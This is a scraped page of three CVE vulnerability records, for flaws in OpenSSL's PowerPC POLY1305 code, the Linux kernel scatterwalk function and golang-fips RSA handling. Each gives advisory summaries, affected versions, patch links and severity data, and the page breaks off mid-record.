2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: The POLY1305 MAC (message authentication code) implementation
contains a bug that might corrupt the internal state of applications running
on PowerPC CPU based platforms if the CPU provides vector instructions.
Impact summary: If an attacker can influence whether the POLY1305 MAC
algorithm is used, the application state might be corrupted with various
application dependent consequences.
The POLY1305 MAC (message authentication code) implementation in OpenSSL for
PowerPC CPUs restores the contents of vector registers in a different order
than they are saved. Thus the contents of some of these vector registers
are corrupted when returning to the caller. The vulnerable code is used only
on newer PowerPC processors supporting the PowerISA 2.07 instructions.
The consequences of this kind of internal application state corruption can
be various - from no consequences, if the calling application does not
depend on the contents of non-volatile XMM registers at all, to the worst
consequences, where the attacker could get complete control of the application
process. However unless the compiler uses the vector registers for storing
pointers, the most likely consequence, if any, would be an incorrect result
of some application dependent calculations or a crash leading to a denial of
service.
The POLY1305 MAC algorithm is most frequently used as part of the
CHACHA20-POLY1305 AEAD (authenticated encryption with associated data)
algorithm. The most common usage of this AEAD cipher is with TLS protocol
versions 1.2 and 1.3. If this cipher is enabled on the server a malicious
client can influence whether this AEAD cipher is used. This implies that
TLS server applications using OpenSSL can be potentially impacted. However
we are currently not aware of any concrete application that would be affected
by this issue therefore we consider this a Low severity security issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:17.314Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20240109.txt" }, { "name": "3.2.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/5b139f95c9a47a55a0c54100f3837b1eee942b04" }, { "name": "3.1.5 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/f3fc5808fe9ff74042d639839610d03b8fdcc015" }, { "name": "3.0.13 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/050d26383d4e264966fb83428e72d5d48f402d35" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240216-0009/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0013/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0008/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240503-0011/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.2.1", "status": "affected", "version": "3.2.0", "versionType": "semver" }, { "lessThan": "3.1.5", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.13", "status": "affected", "version": "3.0.0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Sverker Eriksson" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Rohan McLure" } ], "datePublic": "2024-01-09T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: The POLY1305 MAC (message authentication code) implementation\u003cbr\u003econtains a bug that might corrupt the internal state of applications running\u003cbr\u003eon PowerPC CPU based platforms if the CPU provides vector instructions.\u003cbr\u003e\u003cbr\u003eImpact summary: If an attacker can influence whether the POLY1305 MAC\u003cbr\u003ealgorithm is used, the application state might be corrupted with various\u003cbr\u003eapplication dependent consequences.\u003cbr\u003e\u003cbr\u003eThe POLY1305 MAC (message authentication code) implementation in OpenSSL for\u003cbr\u003ePowerPC CPUs restores the contents of vector registers in a different order\u003cbr\u003ethan they are saved. Thus the contents of some of these vector registers\u003cbr\u003eare corrupted when returning to the caller. The vulnerable code is used only\u003cbr\u003eon newer PowerPC processors supporting the PowerISA 2.07 instructions.\u003cbr\u003e\u003cbr\u003eThe consequences of this kind of internal application state corruption can\u003cbr\u003ebe various - from no consequences, if the calling application does not\u003cbr\u003edepend on the contents of non-volatile XMM registers at all, to the worst\u003cbr\u003econsequences, where the attacker could get complete control of the application\u003cbr\u003eprocess. However unless the compiler uses the vector registers for storing\u003cbr\u003epointers, the most likely consequence, if any, would be an incorrect result\u003cbr\u003eof some application dependent calculations or a crash leading to a denial of\u003cbr\u003eservice.\u003cbr\u003e\u003cbr\u003eThe POLY1305 MAC algorithm is most frequently used as part of the\u003cbr\u003eCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)\u003cbr\u003ealgorithm. The most common usage of this AEAD cipher is with TLS protocol\u003cbr\u003eversions 1.2 and 1.3. If this cipher is enabled on the server a malicious\u003cbr\u003eclient can influence whether this AEAD cipher is used. This implies that\u003cbr\u003eTLS server applications using OpenSSL can be potentially impacted. However\u003cbr\u003ewe are currently not aware of any concrete application that would be affected\u003cbr\u003eby this issue therefore we consider this a Low severity security issue." } ], "value": "Issue summary: The POLY1305 MAC (message authentication code) implementation\ncontains a bug that might corrupt the internal state of applications running\non PowerPC CPU based platforms if the CPU provides vector instructions.\n\nImpact summary: If an attacker can influence whether the POLY1305 MAC\nalgorithm is used, the application state might be corrupted with various\napplication dependent consequences.\n\nThe POLY1305 MAC (message authentication code) implementation in OpenSSL for\nPowerPC CPUs restores the contents of vector registers in a different order\nthan they are saved. Thus the contents of some of these vector registers\nare corrupted when returning to the caller. The vulnerable code is used only\non newer PowerPC processors supporting the PowerISA 2.07 instructions.\n\nThe consequences of this kind of internal application state corruption can\nbe various - from no consequences, if the calling application does not\ndepend on the contents of non-volatile XMM registers at all, to the worst\nconsequences, where the attacker could get complete control of the application\nprocess. However unless the compiler uses the vector registers for storing\npointers, the most likely consequence, if any, would be an incorrect result\nof some application dependent calculations or a crash leading to a denial of\nservice.\n\nThe POLY1305 MAC algorithm is most frequently used as part of the\nCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)\nalgorithm. The most common usage of this AEAD cipher is with TLS protocol\nversions 1.2 and 1.3. If this cipher is enabled on the server a malicious\nclient can influence whether this AEAD cipher is used. This implies that\nTLS server applications using OpenSSL can be potentially impacted. However\nwe are currently not aware of any concrete application that would be affected\nby this issue therefore we consider this a Low severity security issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-440", "description": "CWE-440 Expected Behavior Violation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:55.315Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20240109.txt" }, { "name": "3.2.1 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/5b139f95c9a47a55a0c54100f3837b1eee942b04" }, { "name": "3.1.5 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/f3fc5808fe9ff74042d639839610d03b8fdcc015" }, { "name": "3.0.13 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/050d26383d4e264966fb83428e72d5d48f402d35" } ], "source": { "discovery": "UNKNOWN" }, "title": "POLY1305 MAC implementation corrupts vector registers on PowerPC", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-6129", "datePublished": "2024-01-09T16:36:58.860Z", "dateReserved": "2023-11-14T16:12:12.656Z", "dateUpdated": "2024-10-14T14:55:55.315Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6176
Vulnerability from cvelistv5
Published
2023-11-16 17:15
Modified
2024-11-15 15:12
Severity ?
EPSS score ?
Summary
A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6176 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2219359 | issue-tracking, x_refsource_REDHAT | |
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfaa80c91f6f99b9342b6557f0f0e1143e434066 |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:17.800Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6176" }, { "name": "RHBZ#2219359", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219359" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfaa80c91f6f99b9342b6557f0f0e1143e434066" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-12T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Low" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:12:26.133Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6176" }, { "name": "RHBZ#2219359", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219359" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfaa80c91f6f99b9342b6557f0f0e1143e434066" } ], "timeline": [ { "lang": "en", "time": "2023-07-03T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-12T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: local dos vulnerability in scatterwalk_copychunks" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6176", "datePublished": "2023-11-16T17:15:44.886Z", "dateReserved": "2023-11-16T13:39:30.071Z", "dateUpdated": "2024-11-15T15:12:26.133Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1394
Vulnerability from cvelistv5
Published
2024-03-21 12:16
Modified
2024-12-17 21:47
Severity ?
EPSS score ?
Summary
A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.
References
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Ansible Automation Platform 2.4 for RHEL 8 |
Unaffected: 0:1.4.5-1.el8ap < * cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9 cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9 cpe:/a:redhat:ansible_automation_platform:2.4::el8 cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8 cpe:/a:redhat:ansible_automation_platform:2.4::el9 cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-1394", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-21T18:21:05.099385Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-05T13:50:55.732Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T18:40:20.583Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1462", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1462" }, { "name": "RHSA-2024:1468", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1468" }, { "name": "RHSA-2024:1472", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1472" }, { "name": "RHSA-2024:1501", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1501" }, { "name": "RHSA-2024:1502", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1502" }, { "name": "RHSA-2024:1561", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1561" }, { "name": "RHSA-2024:1563", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1563" }, { "name": "RHSA-2024:1566", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1566" }, { "name": "RHSA-2024:1567", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1567" }, { "name": "RHSA-2024:1574", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1574" }, { "name": "RHSA-2024:1640", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1640" }, { "name": "RHSA-2024:1644", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1644" }, { "name": "RHSA-2024:1646", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1646" }, { "name": "RHSA-2024:1763", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1763" }, { "name": "RHSA-2024:1897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1897" }, { "name": "RHSA-2024:2562", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2562" }, { "name": "RHSA-2024:2568", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2568" }, { "name": "RHSA-2024:2569", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2569" }, { "name": "RHSA-2024:2729", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2729" }, { "name": "RHSA-2024:2730", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2730" }, { "name": "RHSA-2024:2767", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2767" }, { "name": "RHSA-2024:3265", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3265" }, { "name": "RHSA-2024:3352", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3352" }, { "name": "RHSA-2024:4146", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4146" }, { "name": "RHSA-2024:4371", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4371" }, { "name": "RHSA-2024:4378", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4378" }, { "name": "RHSA-2024:4379", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4379" }, { "name": "RHSA-2024:4502", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4502" }, { "name": "RHSA-2024:4581", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4581" }, { "name": "RHSA-2024:4591", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4591" }, { "name": "RHSA-2024:4672", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4672" }, { "name": "RHSA-2024:4699", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4699" }, { "name": "RHSA-2024:4761", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4761" }, { "name": "RHSA-2024:4762", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4762" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1394" }, { "name": "RHBZ#2262921", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262921" }, { "tags": [ "x_transferred" ], "url": "https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136" }, { "tags": [ "x_transferred" ], "url": "https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6" }, { "tags": [ "x_transferred" ], "url": "https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2660" }, { "tags": [ "x_transferred" ], "url": "https://vuln.go.dev/ID/GO-2024-2660.json" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9", "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9", "cpe:/a:redhat:ansible_automation_platform:2.4::el8", "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8", "cpe:/a:redhat:ansible_automation_platform:2.4::el9", "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8" ], "defaultStatus": "affected", "packageName": "receptor", "product": "Red Hat Ansible Automation Platform 2.4 for RHEL 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.4.5-1.el8ap", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9", "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9", "cpe:/a:redhat:ansible_automation_platform:2.4::el8", "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8", "cpe:/a:redhat:ansible_automation_platform:2.4::el9", "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8" ], "defaultStatus": "affected", "packageName": "receptor", "product": "Red Hat Ansible Automation Platform 2.4 for RHEL 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.4.5-1.el9ap", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:devtools:2023::el7" ], "defaultStatus": "affected", "packageName": "go-toolset-1.19-golang", "product": "Red Hat Developer Tools", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.19.13-6.el7_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "go-toolset:rhel8", "product": "Red Hat Enterprise 